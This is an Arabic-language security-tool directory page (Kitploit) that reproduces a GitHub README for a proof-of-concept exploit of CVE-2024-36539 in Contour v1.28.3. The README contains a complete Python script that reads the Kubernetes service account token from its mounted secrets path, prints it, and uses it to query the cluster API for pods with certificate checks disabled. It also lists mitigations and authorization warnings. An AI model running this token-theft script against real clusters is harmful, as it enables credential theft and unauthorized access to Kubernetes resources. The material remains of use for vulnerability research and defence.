Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36539 — إثبات مفهوم لاستغلال يوضح الأذونات غير الآمنة في Contour v1.28.3، مما يتيح سرقة رمز الحساب الخدمي والوصول إلى واجهة Kubernetes API لتصعيد الامتيازات. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/cve-2024-36539
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقأمن السحابةالفريق الأحمر
GitHubabdurahmon3236/cve-2024-36539

CVE-2024-36539

إثبات مفهوم لاستغلال يوضح الأذونات غير الآمنة في Contour v1.28.3، مما يتيح سرقة رمز الحساب الخدمي والوصول إلى واجهة Kubernetes API لتصعيد الامتيازات.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إليك ملف README.md لإثبات المفهوم (PoC) يوضح ثغرة الأذونات غير الآمنة في Contour v1.28.3:


إثبات المفهوم (PoC) لثغرة الأذونات غير الآمنة في Contour v1.28.3

يحتوي هذا المستودع على سكربت إثبات المفهوم (PoC) يوضح ثغرة الأذونات غير الآمنة في Contour v1.28.3. تسمح هذه الثغرة للمهاجمين بالوصول إلى البيانات الحساسة وتصعيد الامتيازات عن طريق الحصول على رمز حساب الخدمة.

وصف الثغرة

CVE-ID: (قيد الانتظار)

نظرة عامة: يحتوي Contour v1.28.3 على أذونات غير آمنة تسمح للمهاجمين بالوصول إلى رمز حساب الخدمة. من خلال استغلال هذه الثغرة، يمكن للمهاجم الحصول على رمز حساب الخدمة، والذي يمكن استخدامه للوصول إلى البيانات الحساسة وربما تصعيد الامتيازات داخل مجموعة Kubernetes.

الإصدارات المتأثرة:

  • Contour v1.28.3

التخفيفات:

  • مراجعة وتعديل أذونات حسابات الخدمة المستخدمة بواسطة Contour.
  • التأكد من أن حسابات الخدمة لديها الحد الأدنى من الأذونات المطلوبة.
  • مراجعة وتدوير رموز حسابات الخدمة بانتظام.

تفاصيل إثبات المفهوم

يوضح سكربت إثبات المفهوم هذا كيفية الوصول إلى رمز حساب الخدمة في Contour v1.28.3. تأكد من حصولك على إذن صريح لإجراء هذا الاختبار.

سكربت إثبات المفهوم

root@kitploit:~
import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

شرح

  1. التكوين: يقوم السكربت بتكوين عنوان URL لواجهة برمجة تطبيقات Kubernetes ومسارات ملفات رمز حساب الخدمة ومساحة الاسم.
  2. الحصول على رمز حساب الخدمة: يقرأ رمز حساب الخدمة من نظام الملفات.
  3. الحصول على مساحة الاسم: يقرأ مساحة الاسم من نظام الملفات.
  4. الوصول إلى واجهة برمجة تطبيقات Kubernetes: يستخدم الرمز لإجراء طلب إلى واجهة برمجة تطبيقات Kubernetes لسرد الحاويات (pods) في مساحة الاسم.

اعتبارات مهمة

  • الأذونات: تأكد من حصولك على إذن صريح لاختبار هذه الثغرة على النظام المستهدف. الاختبار غير المصرح به غير قانوني وغير أخلاقي.
  • بيئة الاختبار: قم بإجراء الاختبارات في بيئة خاضعة للرقابة لتجنب التأثير على أنظمة الإنتاج.
  • الاستخدام الأخلاقي: استخدم إثبات المفهوم هذا بمسؤولية وفقط في السياقات المصرح بها.

التخفيف

لمعالجة هذه الثغرة:

  1. مراجعة أذونات حسابات الخدمة: تأكد من أن حسابات الخدمة لديها الحد الأدنى من الأذونات المطلوبة.
  2. تدقيق وتدوير الرموز: قم بمراجعة حسابات الخدمة بانتظام وتدوير الرموز لتقليل خطر اختراق الرمز.
  3. تحديث Contour: حافظ على تحديث Contour ومكونات Kubernetes الأخرى بأحدث التصحيحات الأمنية.

لمزيد من المعلومات حول تأمين نشر Contour، راجع وثائق Contour الرسمية.


يوفر ملف README.md هذا نظرة عامة على الثغرة، وسكربت إثبات المفهوم لإظهار المشكلة، وتعليمات حول كيفية تخفيف المخاطر. تأكد من التعامل مع إثبات المفهوم هذا بمسؤولية وفقط على الأنظمة التي لديك إذن صريح بها.

تنزيل الأداة